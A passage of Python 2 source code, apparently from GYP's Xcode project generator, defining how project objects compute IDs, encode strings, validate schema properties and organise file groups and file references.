If recursive is True, recurse into all descendant objects and update their
hashes.
If overwrite is True, any existing value set in the "id" property will be
replaced.
"""
def _HashUpdate(hash, data):
"""Update hash with data's length and contents.
If the hash were updated only with the value of data, it would be
possible for clowns to induce collisions by manipulating the names of
their objects. By adding the length, it's exceedingly less likely that
ID collisions will be encountered, intentionally or not.
"""
hash.update(struct.pack('>i', len(data)))
hash.update(data)
if seed_hash is None:
seed_hash = _new_sha1()
hash = seed_hash.copy()
hashables = self.Hashables()
assert len(hashables) > 0
for hashable in hashables:
_HashUpdate(hash, hashable)
if recursive:
hashables_for_child = self.HashablesForChild()
if hashables_for_child is None:
child_hash = hash
else:
assert len(hashables_for_child) > 0
child_hash = seed_hash.copy()
for hashable in hashables_for_child:
_HashUpdate(child_hash, hashable)
for child in self.Children():
child.ComputeIDs(recursive, overwrite, child_hash)
if overwrite or self.id is None:
# Xcode IDs are only 96 bits (24 hex characters), but a SHA-1 digest is
# 160 bits. Instead of throwing out 64 bits of the digest, xor them
# into the portion that gets used.
assert hash.digest_size % 4 == 0
digest_int_count = hash.digest_size / 4
digest_ints = struct.unpack('>' + 'I' * digest_int_count, hash.digest())
id_ints = [0, 0, 0]
for index in xrange(0, digest_int_count):
id_ints[index % 3] ^= digest_ints[index]
self.id = '%08X%08X%08X' % tuple(id_ints)
def EnsureNoIDCollisions(self):
"""Verifies that no two objects have the same ID. Checks all descendants.
"""
ids = {}
descendants = self.Descendants()
for descendant in descendants:
if descendant.id in ids:
other = ids[descendant.id]
raise KeyError(
'Duplicate ID %s, objects "%s" and "%s" in "%s"' % \
(descendant.id, str(descendant._properties),
str(other._properties), self._properties['rootObject'].Name()))
ids[descendant.id] = descendant
def Children(self):
"""Returns a list of all of this object's owned (strong) children."""
children = []
for property, attributes in self._schema.iteritems():
(is_list, property_type, is_strong) = attributes[0:3]
if is_strong and property in self._properties:
if not is_list:
children.append(self._properties[property])
else:
children.extend(self._properties[property])
return children
def Descendants(self):
"""Returns a list of all of this object's descendants, including this
object.
"""
children = self.Children()
descendants = [self]
for child in children:
descendants.extend(child.Descendants())
return descendants
def PBXProjectAncestor(self):
# The base case for recursion is defined at PBXProject.PBXProjectAncestor.
if self.parent:
return self.parent.PBXProjectAncestor()
return None
def _EncodeComment(self, comment):
"""Encodes a comment to be placed in the project file output, mimicing
Xcode behavior.
"""
# This mimics Xcode behavior by wrapping the comment in "/*" and "*/". If
# the string already contains a "*/", it is turned into "(*)/". This keeps
# the file writer from outputting something that would be treated as the
# end of a comment in the middle of something intended to be entirely a
# comment.
return '/* ' + comment.replace('*/', '(*)/') + ' */'
def _EncodeTransform(self, match):
# This function works closely with _EncodeString. It will only be called
# by re.sub with match.group(0) containing a character matched by the
# _escaped expression.
char = match.group(0)
# Backslashes (\) and quotation marks (") are always replaced with a
# backslash-escaped version of the same. Everything else gets its
# replacement from the class' _encode_transforms array.
if char == '\\':
return '\\\\'
if char == '"':
return '\\"'
return self._encode_transforms[ord(char)]
def _EncodeString(self, value):
"""Encodes a string to be placed in the project file output, mimicing
Xcode behavior.
"""
# Use quotation marks when any character outside of the range A-Z, a-z, 0-9,
# $ (dollar sign), . (period), and _ (underscore) is present. Also use
# quotation marks to represent empty strings.
#
# Escape " (double-quote) and \ (backslash) by preceding them with a
# backslash.
#
# Some characters below the printable ASCII range are encoded specially:
# 7 ^G BEL is encoded as "\a"
# 8 ^H BS is encoded as "\b"
# 11 ^K VT is encoded as "\v"
# 12 ^L NP is encoded as "\f"
# 127 ^? DEL is passed through as-is without escaping
# - In PBXFileReference and PBXBuildFile objects:
# 9 ^I HT is passed through as-is without escaping
# 10 ^J NL is passed through as-is without escaping
# 13 ^M CR is passed through as-is without escaping
# - In other objects:
# 9 ^I HT is encoded as "\t"
# 10 ^J NL is encoded as "\n"
# 13 ^M CR is encoded as "\n" rendering it indistinguishable from
# 10 ^J NL
# All other characters within the ASCII control character range (0 through
# 31 inclusive) are encoded as "\U001f" referring to the Unicode code point
# in hexadecimal. For example, character 14 (^N SO) is encoded as "\U000e".
# Characters above the ASCII range are passed through to the output encoded
# as UTF-8 without any escaping. These mappings are contained in the
# class' _encode_transforms list.
if _unquoted.search(value) and not _quoted.search(value):
return value
return '"' + _escaped.sub(self._EncodeTransform, value) + '"'
def _XCPrint(self, file, tabs, line):
file.write('\t' * tabs + line)
def _XCPrintableValue(self, tabs, value, flatten_list=False):
"""Returns a representation of value that may be printed in a project file,
mimicking Xcode's behavior.
_XCPrintableValue can handle str and int values, XCObjects (which are
made printable by returning their id property), and list and dict objects
composed of any of the above types. When printing a list or dict, and
_should_print_single_line is False, the tabs parameter is used to determine
how much to indent the lines corresponding to the items in the list or
dict.
If flatten_list is True, single-element lists will be transformed into
strings.
"""
printable = ''
comment = None
if self._should_print_single_line:
sep = ' '
element_tabs = ''
end_tabs = ''
else:
sep = '\n'
element_tabs = '\t' * (tabs + 1)
end_tabs = '\t' * tabs
if isinstance(value, XCObject):
printable += value.id
comment = value.Comment()
elif isinstance(value, str):
printable += self._EncodeString(value)
elif isinstance(value, unicode):
printable += self._EncodeString(value.encode('utf-8'))
elif isinstance(value, int):
printable += str(value)
elif isinstance(value, list):
if flatten_list and len(value) <= 1:
if len(value) == 0:
printable += self._EncodeString('')
else:
printable += self._EncodeString(value[0])
else:
printable = '(' + sep
for item in value:
printable += element_tabs + \
self._XCPrintableValue(tabs + 1, item, flatten_list) + \
',' + sep
printable += end_tabs + ')'
elif isinstance(value, dict):
printable = '{' + sep
for item_key, item_value in sorted(value.iteritems()):
printable += element_tabs + \
self._XCPrintableValue(tabs + 1, item_key, flatten_list) + ' = ' + \
self._XCPrintableValue(tabs + 1, item_value, flatten_list) + ';' + \
sep
printable += end_tabs + '}'
else:
raise TypeError("Can't make " + value.__class__.__name__ + ' printable')
if comment != None:
printable += ' ' + self._EncodeComment(comment)
return printable
def _XCKVPrint(self, file, tabs, key, value):
"""Prints a key and value, members of an XCObject's _properties dictionary,
to file.
tabs is an int identifying the indentation level. If the class'
_should_print_single_line variable is True, tabs is ignored and the
key-value pair will be followed by a space instead of a newline.
"""
if self._should_print_single_line:
printable = ''
after_kv = ' '
else:
printable = '\t' * tabs
after_kv = '\n'
# Xcode usually prints remoteGlobalIDString values in PBXContainerItemProxy
# objects without comments. Sometimes it prints them with comments, but
# the majority of the time, it doesn't. To avoid unnecessary changes to
# the project file after Xcode opens it, don't write comments for
# remoteGlobalIDString. This is a sucky hack and it would certainly be
# cleaner to extend the schema to indicate whether or not a comment should
# be printed, but since this is the only case where the problem occurs and
# Xcode itself can't seem to make up its mind, the hack will suffice.
#
# Also see PBXContainerItemProxy._schema['remoteGlobalIDString'].
if key == 'remoteGlobalIDString' and isinstance(self,
PBXContainerItemProxy):
value_to_print = value.id
else:
value_to_print = value
# PBXBuildFile's settings property is represented in the output as a dict,
# but a hack here has it represented as a string. Arrange to strip off the
# quotes so that it shows up in the output as expected.
if key == 'settings' and isinstance(self, PBXBuildFile):
strip_value_quotes = True
else:
strip_value_quotes = False
# In another one-off, let's set flatten_list on buildSettings properties
# of XCBuildConfiguration objects, because that's how Xcode treats them.
if key == 'buildSettings' and isinstance(self, XCBuildConfiguration):
flatten_list = True
else:
flatten_list = False
try:
printable_key = self._XCPrintableValue(tabs, key, flatten_list)
printable_value = self._XCPrintableValue(tabs, value_to_print,
flatten_list)
if strip_value_quotes and len(printable_value) > 1 and \
printable_value[0] == '"' and printable_value[-1] == '"':
printable_value = printable_value[1:-1]
printable += printable_key + ' = ' + printable_value + ';' + after_kv
except TypeError, e:
gyp.common.ExceptionAppend(e,
'while printing key "%s"' % key)
raise
self._XCPrint(file, 0, printable)
def Print(self, file=sys.stdout):
"""Prints a reprentation of this object to file, adhering to Xcode output
formatting.
"""
self.VerifyHasRequiredProperties()
if self._should_print_single_line:
# When printing an object in a single line, Xcode doesn't put any space
# between the beginning of a dictionary (or presumably a list) and the
# first contained item, so you wind up with snippets like
# ...CDEF = {isa = PBXFileReference; fileRef = 0123...
# If it were me, I would have put a space in there after the opening
# curly, but I guess this is just another one of those inconsistencies
# between how Xcode prints PBXFileReference and PBXBuildFile objects as
# compared to other objects. Mimic Xcode's behavior here by using an
# empty string for sep.
sep = ''
end_tabs = 0
else:
sep = '\n'
end_tabs = 2
# Start the object. For example, '\t\tPBXProject = {\n'.
self._XCPrint(file, 2, self._XCPrintableValue(2, self) + ' = {' + sep)
# "isa" isn't in the _properties dictionary, it's an intrinsic property
# of the class which the object belongs to. Xcode always outputs "isa"
# as the first element of an object dictionary.
self._XCKVPrint(file, 3, 'isa', self.__class__.__name__)
# The remaining elements of an object dictionary are sorted alphabetically.
for property, value in sorted(self._properties.iteritems()):
self._XCKVPrint(file, 3, property, value)
# End the object.
self._XCPrint(file, end_tabs, '};\n')
def UpdateProperties(self, properties, do_copy=False):
"""Merge the supplied properties into the _properties dictionary.
The input properties must adhere to the class schema or a KeyError or
TypeError exception will be raised. If adding an object of an XCObject
subclass and the schema indicates a strong relationship, the object's
parent will be set to this object.
If do_copy is True, then lists, dicts, strong-owned XCObjects, and
strong-owned XCObjects in lists will be copied instead of having their
references added.
"""
if properties is None:
return
for property, value in properties.iteritems():
# Make sure the property is in the schema.
if not property in self._schema:
raise KeyError(property + ' not in ' + self.__class__.__name__)
# Make sure the property conforms to the schema.
(is_list, property_type, is_strong) = self._schema[property][0:3]
if is_list:
if value.__class__ != list:
raise TypeError(
property + ' of ' + self.__class__.__name__ + \
' must be list, not ' + value.__class__.__name__)
for item in value:
if not isinstance(item, property_type) and \
not (item.__class__ == unicode and property_type == str):
# Accept unicode where str is specified. str is treated as
# UTF-8-encoded.
raise TypeError(
'item of ' + property + ' of ' + self.__class__.__name__ + \
' must be ' + property_type.__name__ + ', not ' + \
item.__class__.__name__)
elif not isinstance(value, property_type) and \
not (value.__class__ == unicode and property_type == str):
# Accept unicode where str is specified. str is treated as
# UTF-8-encoded.
raise TypeError(
property + ' of ' + self.__class__.__name__ + ' must be ' + \
property_type.__name__ + ', not ' + value.__class__.__name__)
# Checks passed, perform the assignment.
if do_copy:
if isinstance(value, XCObject):
if is_strong:
self._properties[property] = value.Copy()
else:
self._properties[property] = value
elif isinstance(value, str) or isinstance(value, unicode) or \
isinstance(value, int):
self._properties[property] = value
elif isinstance(value, list):
if is_strong:
# If is_strong is True, each element is an XCObject, so it's safe
# to call Copy.
self._properties[property] = []
for item in value:
self._properties[property].append(item.Copy())
else:
self._properties[property] = value[:]
elif isinstance(value, dict):
self._properties[property] = value.copy()
else:
raise TypeError("Don't know how to copy a " + \
value.__class__.__name__ + ' object for ' + \
property + ' in ' + self.__class__.__name__)
else:
self._properties[property] = value
# Set up the child's back-reference to this object. Don't use |value|
# any more because it may not be right if do_copy is true.
if is_strong:
if not is_list:
self._properties[property].parent = self
else:
for item in self._properties[property]:
item.parent = self
def HasProperty(self, key):
return key in self._properties
def GetProperty(self, key):
return self._properties[key]
def SetProperty(self, key, value):
self.UpdateProperties({key: value})
def DelProperty(self, key):
if key in self._properties:
del self._properties[key]
def AppendProperty(self, key, value):
# TODO(mark): Support ExtendProperty too (and make this call that)?
# Schema validation.
if not key in self._schema:
raise KeyError(key + ' not in ' + self.__class__.__name__)
(is_list, property_type, is_strong) = self._schema[key][0:3]
if not is_list:
raise TypeError(key + ' of ' + self.__class__.__name__ + ' must be list')
if not isinstance(value, property_type):
raise TypeError('item of ' + key + ' of ' + self.__class__.__name__ + \
' must be ' + property_type.__name__ + ', not ' + \
value.__class__.__name__)
# If the property doesn't exist yet, create a new empty list to receive the
# item.
if not key in self._properties:
self._properties[key] = []
# Set up the ownership link.
if is_strong:
value.parent = self
# Store the item.
self._properties[key].append(value)
def VerifyHasRequiredProperties(self):
"""Ensure that all properties identified as required by the schema are
set.
"""
# TODO(mark): A stronger verification mechanism is needed. Some
# subclasses need to perform validation beyond what the schema can enforce.
for property, attributes in self._schema.iteritems():
(is_list, property_type, is_strong, is_required) = attributes[0:4]
if is_required and not property in self._properties:
raise KeyError(self.__class__.__name__ + ' requires ' + property)
def _SetDefaultsFromSchema(self):
"""Assign object default values according to the schema. This will not
overwrite properties that have already been set."""
defaults = {}
for property, attributes in self._schema.iteritems():
(is_list, property_type, is_strong, is_required) = attributes[0:4]
if is_required and len(attributes) >= 5 and \
not property in self._properties:
default = attributes[4]
defaults[property] = default
if len(defaults) > 0:
# Use do_copy=True so that each new object gets its own copy of strong
# objects, lists, and dicts.
self.UpdateProperties(defaults, do_copy=True)
class XCHierarchicalElement(XCObject):
"""Abstract base for PBXGroup and PBXFileReference. Not represented in a
project file."""
# TODO(mark): Do name and path belong here? Probably so.
# If path is set and name is not, name may have a default value. Name will
# be set to the basename of path, if the basename of path is different from
# the full value of path. If path is already just a leaf name, name will
# not be set.
_schema = XCObject._schema.copy()
_schema.update({
'comments': [0, str, 0, 0],
'fileEncoding': [0, str, 0, 0],
'includeInIndex': [0, int, 0, 0],
'indentWidth': [0, int, 0, 0],
'lineEnding': [0, int, 0, 0],
'sourceTree': [0, str, 0, 1, '<group>'],
'tabWidth': [0, int, 0, 0],
'usesTabs': [0, int, 0, 0],
'wrapsLines': [0, int, 0, 0],
})
def __init__(self, properties=None, id=None, parent=None):
# super
XCObject.__init__(self, properties, id, parent)
if 'path' in self._properties and not 'name' in self._properties:
path = self._properties['path']
name = posixpath.basename(path)
if name != '' and path != name:
self.SetProperty('name', name)
if 'path' in self._properties and \
(not 'sourceTree' in self._properties or \
self._properties['sourceTree'] == '<group>'):
# If the pathname begins with an Xcode variable like "$(SDKROOT)/", take
# the variable out and make the path be relative to that variable by
# assigning the variable name as the sourceTree.
(source_tree, path) = SourceTreeAndPathFromPath(self._properties['path'])
if source_tree != None:
self._properties['sourceTree'] = source_tree
if path != None:
self._properties['path'] = path
if source_tree != None and path is None and \
not 'name' in self._properties:
# The path was of the form "$(SDKROOT)" with no path following it.
# This object is now relative to that variable, so it has no path
# attribute of its own. It does, however, keep a name.
del self._properties['path']
self._properties['name'] = source_tree
def Name(self):
if 'name' in self._properties:
return self._properties['name']
elif 'path' in self._properties:
return self._properties['path']
else:
# This happens in the case of the root PBXGroup.
return None
def Hashables(self):
"""Custom hashables for XCHierarchicalElements.
XCHierarchicalElements are special. Generally, their hashes shouldn't
change if the paths don't change. The normal XCObject implementation of
Hashables adds a hashable for each object, which means that if
the hierarchical structure changes (possibly due to changes caused when
TakeOverOnlyChild runs and encounters slight changes in the hierarchy),
the hashes will change. For example, if a project file initially contains
a/b/f1 and the a and b groups are collapsed into a single a/b group, f1 will have a single parent
a/b. If someone later adds a/f2 to the project file, a/b can no longer be
collapsed, and f1 winds up with parent b and grandparent a. That would
be sufficient to change f1's hash.
To counteract this problem, hashables for all XCHierarchicalElements except
for the main group (which has neither a name nor a path) are taken to be
just the set of path components. Because hashables are inherited from
parents, this provides assurance that a/b/f1 has the same set of hashables
whether its parent is b or a/b.
The main group is a special case. As it is permitted to have no name or
path, it is permitted to use the standard XCObject hash mechanism. This
is not considered a problem because there can be only one main group.
"""
if self == self.PBXProjectAncestor()._properties['mainGroup']:
# super
return XCObject.Hashables(self)
hashables = []
# Put the name in first, ensuring that if TakeOverOnlyChild collapses
# children into a top-level group like "Source", the name always goes
# into the list of hashables without interfering with path components.
if 'name' in self._properties:
# Make it less likely for people to manipulate hashes by following the
# pattern of always pushing an object type value onto the list first.
hashables.append(self.__class__.__name__ + '.name')
hashables.append(self._properties['name'])
# NOTE: This still has the problem that if an absolute path is encountered,
# including paths with a sourceTree, they'll still inherit their parents'
# hashables, even though the paths aren't relative to their parents. This
# is not expected to be much of a problem in practice.
path = self.PathFromSourceTreeAndPath()
if path != None:
components = path.split(posixpath.sep)
for component in components:
hashables.append(self.__class__.__name__ + '.path')
hashables.append(component)
hashables.extend(self._hashables)
return hashables
def Compare(self, other):
# Allow comparison of these types. PBXGroup has the highest sort rank;
# PBXVariantGroup is treated as equal to PBXFileReference.
valid_class_types = {
PBXFileReference: 'file',
PBXGroup: 'group',
PBXVariantGroup: 'file',
}
self_type = valid_class_types[self.__class__]
other_type = valid_class_types[other.__class__]
if self_type == other_type:
# If the two objects are of the same sort rank, compare their names.
return cmp(self.Name(), other.Name())
# Otherwise, sort groups before everything else.
if self_type == 'group':
return -1
return 1
def CompareRootGroup(self, other):
# This function should be used only to compare direct children of the
# containing PBXProject's mainGroup. These groups should appear in the
# listed order.
# TODO(mark): "Build" is used by gyp.generator.xcode, perhaps the
# generator should have a way of influencing this list rather than having
# to hardcode for the generator here.
order = ['Source', 'Intermediates', 'Projects', 'Frameworks', 'Products',
'Build']
# If the groups aren't in the listed order, do a name comparison.
# Otherwise, groups in the listed order should come before those that
# aren't.
self_name = self.Name()
other_name = other.Name()
self_in = isinstance(self, PBXGroup) and self_name in order
other_in = isinstance(other, PBXGroup) and other_name in order
if not self_in and not other_in:
return self.Compare(other)
if self_name in order and not other_name in order:
return -1
if other_name in order and not self_name in order:
return 1
# If both groups are in the listed order, go by the defined order.
self_index = order.index(self_name)
other_index = order.index(other_name)
if self_index < other_index:
return -1
if self_index > other_index:
return 1
return 0
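# For example (illustrative): among mainGroup children, a PBXGroup named
# 'Source' sorts before one named 'Frameworks' (both appear in the listed
# order), any listed group sorts before an unlisted one, and two unlisted
# children fall back to Compare(), which puts groups before files and then
# sorts by name.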
def PathFromSourceTreeAndPath(self):
# Turn the object's sourceTree and path properties into a single flat
# string of a form comparable to the path parameter. If there's a
# sourceTree property other than "<group>", wrap it in $(...) for the
# comparison.
components = []
if self._properties['sourceTree'] != '<group>':
components.append('$(' + self._properties['sourceTree'] + ')')
if 'path' in self._properties:
components.append(self._properties['path'])
if len(components) > 0:
return posixpath.join(*components)
return None
def FullPath(self):
# Returns a full path to self relative to the project file, or relative
# to some other source tree. Start with self, and walk up the chain of
# parents prepending their paths, if any, until no more parents are
# available (project-relative path) or until a path relative to some
# source tree is found.
xche = self
path = None
while isinstance(xche, XCHierarchicalElement) and \
(path is None or \
(not path.startswith('/') and not path.startswith('$'))):
this_path = xche.PathFromSourceTreeAndPath()
if this_path != None and path != None:
path = posixpath.join(this_path, path)
elif this_path != None:
path = this_path
xche = xche.parent
return path
class PBXGroup(XCHierarchicalElement):
"""
Attributes:
_children_by_path: Maps pathnames of children of this PBXGroup to the
actual child XCHierarchicalElement objects.
_variant_children_by_name_and_path: Maps (name, path) tuples of
PBXVariantGroup children to the actual child PBXVariantGroup objects.
"""
_schema = XCHierarchicalElement._schema.copy()
_schema.update({
'children': [1, XCHierarchicalElement, 1, 1, []],
'name': [0, str, 0, 0],
'path': [0, str, 0, 0],
})
def __init__(self, properties=None, id=None, parent=None):
# super
XCHierarchicalElement.__init__(self, properties, id, parent)
self._children_by_path = {}
self._variant_children_by_name_and_path = {}
for child in self._properties.get('children', []):
self._AddChildToDicts(child)
def Hashables(self):
# super
hashables = XCHierarchicalElement.Hashables(self)
# It is not sufficient to just rely on name and parent to build a unique
# hashable : a node could have two child PBXGroup sharing a common name.
# To add entropy the hashable is enhanced with the names of all its
# children.
for child in self._properties.get('children', []):
child_name = child.Name()
if child_name != None:
hashables.append(child_name)
return hashables
def HashablesForChild(self):
# To avoid a circular reference the hashables used to compute a child id do
# not include the child names.
return XCHierarchicalElement.Hashables(self)
def _AddChildToDicts(self, child):
# Sets up this PBXGroup object's dicts to reference the child properly.
child_path = child.PathFromSourceTreeAndPath()
if child_path:
if child_path in self._children_by_path:
raise ValueError('Found multiple children with path ' + child_path)
self._children_by_path[child_path] = child
if isinstance(child, PBXVariantGroup):
child_name = child._properties.get('name', None)
key = (child_name, child_path)
if key in self._variant_children_by_name_and_path:
raise ValueError('Found multiple PBXVariantGroup children with ' + \
'name ' + str(child_name) + ' and path ' + \
str(child_path))
self._variant_children_by_name_and_path[key] = child
def AppendChild(self, child):
# Callers should use this instead of calling
# AppendProperty('children', child) directly because this function
# maintains the group's dicts.
self.AppendProperty('children', child)
self._AddChildToDicts(child)
def GetChildByName(self, name):
# This is not currently optimized with a dict as GetChildByPath is because
# it has few callers. Most callers probably want GetChildByPath. This
# function is only useful to get children that have names but no paths,
# which is rare. The children of the main group ("Source", "Products",
# etc.) is pretty much the only case where this likely to come up.
#
# TODO(mark): Maybe this should raise an error if more than one child is
# present with the same name.
if not 'children' in self._properties:
return None
for child in self._properties['children']:
if child.Name() == name:
return child
return None
def GetChildByPath(self, path):
if not path:
return None
if path in self._children_by_path:
return self._children_by_path[path]
return None
def GetChildByRemoteObject(self, remote_object):
# This method is a little bit esoteric. Given a remote_object, which
# should be a PBXFileReference in another project file, this method will
# return this group's PBXReferenceProxy object serving as a local proxy
# for the remote PBXFileReference.
#
# This function might benefit from a dict optimization as GetChildByPath
# for some workloads, but profiling shows that it's not currently a
# problem.
if not 'children' in self._properties:
return None
for child in self._properties['children']:
if not isinstance(child, PBXReferenceProxy):
continue
container_proxy = child._properties['remoteRef']
if container_proxy._properties['remoteGlobalIDString'] == remote_object:
return child
return None
def AddOrGetFileByPath(self, path, hierarchical):
"""Returns an existing or new file reference corresponding to path.
If hierarchical is True, this method will create or use the necessary
hierarchical group structure corresponding to path. Otherwise, it will
look in and create an item in the current group only.
If an existing matching reference is found, it is returned, otherwise, a
new one will be created, added to the correct group, and returned.
If path identifies a directory by virtue of carrying a trailing slash,
this method returns a PBXFileReference of "folder" type. If path
identifies a variant, by virtue of it identifying a file inside a directory
with an ".lproj" extension, this method returns a PBXVariantGroup
containing the variant named by path, and possibly other variants. For
all other paths, a "normal" PBXFileReference will be returned.
"""
# Adding or getting a directory? Directories end with a trailing slash.
is_dir = False
if path.endswith('/'):
is_dir = True
path = posixpath.normpath(path)
if is_dir:
path = path + '/'
# Adding or getting a variant? Variants are files inside directories
# with an ".lproj" extension. Xcode uses variants for localization. For
# a variant path/to/Language.lproj/MainMenu.nib, put a variant group named
# MainMenu.nib inside path/to, and give it a variant named Language. In
# this example, grandparent would be set to path/to and parent_root would
# be set to Language.
variant_name = None
parent = posixpath.dirname(path)
grandparent = posixpath.dirname(parent)
parent_basename = posixpath.basename(parent)
(parent_root, parent_ext) = posixpath.splitext(parent_basename)
if parent_ext == '.lproj':
variant_name = parent_root
if grandparent == '':
grandparent = None
# Putting a directory inside a variant group is not currently supported.
assert not is_dir or variant_name is None
path_split = path.split(posixpath.sep)
if len(path_split) == 1 or \
((is_dir or variant_name != None) and len(path_split) == 2) or \
not hierarchical:
# The PBXFileReference or PBXVariantGroup will be added to or gotten from
# this PBXGroup, no recursion necessary.
if variant_name is None:
# Add or get a PBXFileReference.
file_ref = self.GetChildByPath(path)
if file_ref != None:
assert file_ref.__class__ == PBXFileReference
else:
file_ref = PBXFileReference({'path': path})
self.AppendChild(file_ref)
else:
# Add or get a PBXVariantGroup. The variant group name is the same
# as the basename (MainMenu.nib in the example above). grandparent
# specifies the path to the variant group itself, and path_split[-2:]
# is the path of the specific variant relative to its group.
variant_group_name = posixpath.basename(path)
variant_group_ref = self.AddOrGetVariantGroupByNameAndPath(
variant_group_name, grandparent)
variant_path = posixpath.sep.join(path_split[-2:])
variant_ref = variant_group_ref.GetChildByPath(variant_path)
if variant_ref != None:
assert variant_ref.__class__ == PBXFileReference
else:
variant_ref = PBXFileReference({'name': variant_name,
'path': variant_path})
variant_group_ref.AppendChild(variant_ref)
# The caller is interested in the variant group, not the specific
# variant file.
file_ref = variant_group_ref
return file_ref
else:
# Hierarchical recursion. Add or get a PBXGroup corresponding to the
# outermost path component, and then recurse into it, chopping off that
# path component.
next_dir = path_split[0]
group_ref = self.GetChildByPath(next_dir)
if group_ref != None:
assert group_ref.__class__ == PBXGroup
else:
group_ref = PBXGroup({'path': next_dir})
self.AppendChild(group_ref)
return group_ref.AddOrGetFileByPath(posixpath.sep.join(path_split[1:]),
hierarchical)
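  # Illustrative sketch (editor's addition, not part of the original module):
  # assuming main_group is a PBXGroup, a localized .nib path yields a
  # PBXVariantGroup while an ordinary source path yields a PBXFileReference.
  #
  #   nib_ref = main_group.AddOrGetFileByPath(
  #       'app/English.lproj/MainMenu.nib', hierarchical=True)
  #   # nib_ref is the PBXVariantGroup named 'MainMenu.nib' inside the 'app'
  #   # group, holding a PBXFileReference for the 'English' variant.
  #   src_ref = main_group.AddOrGetFileByPath('app/main.cc', hierarchical=True)
  #   # src_ref is a PBXFileReference; calling again with the same path
  #   # returns the existing object instead of creating a duplicate.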
def AddOrGetVariantGroupByNameAndPath(self, name, path):
"""Returns an existing or new PBXVariantGroup for name and path.
If a PBXVariantGroup identified by the name and path arguments is already
present as a child of this object, it is returned. Otherwise, a new
PBXVariantGroup with the correct properties is created, added as a child,
and returned.
This method will generally be called by AddOrGetFileByPath, which knows
when to create a variant group based on the structure of the pathnames
passed to it.
"""
key = (name, path)
if key in self._variant_children_by_name_and_path:
variant_group_ref = self._variant_children_by_name_and_path[key]
assert variant_group_ref.__class__ == PBXVariantGroup
return variant_group_ref
variant_group_properties = {'name': name}
if path != None:
variant_group_properties['path'] = path
variant_group_ref = PBXVariantGroup(variant_group_properties)
self.AppendChild(variant_group_ref)
return variant_group_ref
def TakeOverOnlyChild(self, recurse=False):
"""If this PBXGroup has only one child and it's also a PBXGroup, take
it over by making all of its children this object's children.
This function will continue to take over only children when those children
are groups. If there are three PBXGroups representing a, b, and c, with
c inside b and b inside a, and a and b have no other children, this will
result in a taking over both b and c, forming a PBXGroup for a/b/c.
If recurse is True, this function will recurse into children and ask them
to collapse themselves by taking over only children as well. Assuming
an example hierarchy with files at a/b/c/d1, a/b/c/d2, and a/b/c/d3/e/f
(d1, d2, and f are files, the rest are groups), recursion will result in
a group for a/b/c containing a group for d3/e.
"""
# At this stage, check that child class types are PBXGroup exactly,
# instead of using isinstance. The only subclass of PBXGroup,
# PBXVariantGroup, should not participate in reparenting in the same way:
# reparenting by merging different object types would be wrong.
while len(self._properties['children']) == 1 and \
self._properties['children'][0].__class__ == PBXGroup:
# Loop to take over the innermost only-child group possible.
child = self._properties['children'][0]
# Assume the child's properties, including its children. Save a copy
# of this object's old properties, because they'll still be needed.
# This object retains its existing id and parent attributes.
old_properties = self._properties
self._properties = child._properties
self._children_by_path = child._children_by_path
if not 'sourceTree' in self._properties or \
self._properties['sourceTree'] == '<group>':
# The child was relative to its parent. Fix up the path. Note that
# children with a sourceTree other than "<group>" are not relative to
# their parents, so no path fix-up is needed in that case.
if 'path' in old_properties:
if 'path' in self._properties:
# Both the original parent and child have paths set.
self._properties['path'] = posixpath.join(old_properties['path'],
self._properties['path'])
else:
# Only the original parent has a path, use it.
self._properties['path'] = old_properties['path']
if 'sourceTree' in old_properties:
# The original parent had a sourceTree set, use it.
self._properties['sourceTree'] = old_properties['sourceTree']
# If the original parent had a name set, keep using it. If the original
# parent didn't have a name but the child did, let the child's name
# live on. If the name attribute seems unnecessary now, get rid of it.
if 'name' in old_properties and old_properties['name'] != None and \
old_properties['name'] != self.Name():
self._properties['name'] = old_properties['name']
if 'name' in self._properties and 'path' in self._properties and \
self._properties['name'] == self._properties['path']:
del self._properties['name']
# Notify all children of their new parent.
for child in self._properties['children']:
child.parent = self
# If asked to recurse, recurse.
if recurse:
for child in self._properties['children']:
if child.__class__ == PBXGroup:
child.TakeOverOnlyChild(recurse)
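  # Illustrative sketch (editor's addition): collapsing nested single-child
  # groups a > b > c into one group whose path is 'a/b/c'.
  #
  #   a = PBXGroup({'path': 'a'})
  #   b = PBXGroup({'path': 'b'})
  #   c = PBXGroup({'path': 'c'})
  #   a.AppendChild(b)
  #   b.AppendChild(c)
  #   a.TakeOverOnlyChild()
  #   # a._properties['path'] is now 'a/b/c', and a directly owns c's
  #   # (empty) children list.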
def SortGroup(self):
self._properties['children'] = \
sorted(self._properties['children'], cmp=lambda x,y: x.Compare(y))
# Recurse.
for child in self._properties['children']:
if isinstance(child, PBXGroup):
child.SortGroup()
class XCFileLikeElement(XCHierarchicalElement):
# Abstract base for objects that can be used as the fileRef property of
# PBXBuildFile.
def PathHashables(self):
# A PBXBuildFile that refers to this object will call this method to
# obtain additional hashables specific to this XCFileLikeElement. Don't
# just use this object's hashables, they're not specific and unique enough
# on their own (without access to the parent hashables.) Instead, provide
# hashables that identify this object by path by getting its hashables as
# well as the hashables of ancestor XCHierarchicalElement objects.
hashables = []
xche = self
while xche != None and isinstance(xche, XCHierarchicalElement):
xche_hashables = xche.Hashables()
for index in xrange(0, len(xche_hashables)):
hashables.insert(index, xche_hashables[index])
xche = xche.parent
return hashables
class XCContainerPortal(XCObject):
# Abstract base for objects that can be used as the containerPortal property
# of PBXContainerItemProxy.
pass
class XCRemoteObject(XCObject):
# Abstract base for objects that can be used as the remoteGlobalIDString
# property of PBXContainerItemProxy.
pass
class PBXFileReference(XCFileLikeElement, XCContainerPortal, XCRemoteObject):
_schema = XCFileLikeElement._schema.copy()
_schema.update({
'explicitFileType': [0, str, 0, 0],
'lastKnownFileType': [0, str, 0, 0],
'name': [0, str, 0, 0],
'path': [0, str, 0, 1],
})
# Weird output rules for PBXFileReference.
_should_print_single_line = True
# super
_encode_transforms = XCFileLikeElement._alternate_encode_transforms
def __init__(self, properties=None, id=None, parent=None):
# super
XCFileLikeElement.__init__(self, properties, id, parent)
if 'path' in self._properties and self._properties['path'].endswith('/'):
self._properties['path'] = self._properties['path'][:-1]
is_dir = True
else:
is_dir = False
if 'path' in self._properties and \
not 'lastKnownFileType' in self._properties and \
not 'explicitFileType' in self._properties:
# TODO(mark): This is the replacement for a replacement for a quick hack.
# It is no longer incredibly sucky, but this list needs to be extended.
extension_map = {
'a': 'archive.ar',
'app': 'wrapper.application',
'bdic': 'file',
'bundle': 'wrapper.cfbundle',
'c': 'sourcecode.c.c',
'cc': 'sourcecode.cpp.cpp',
'cpp': 'sourcecode.cpp.cpp',
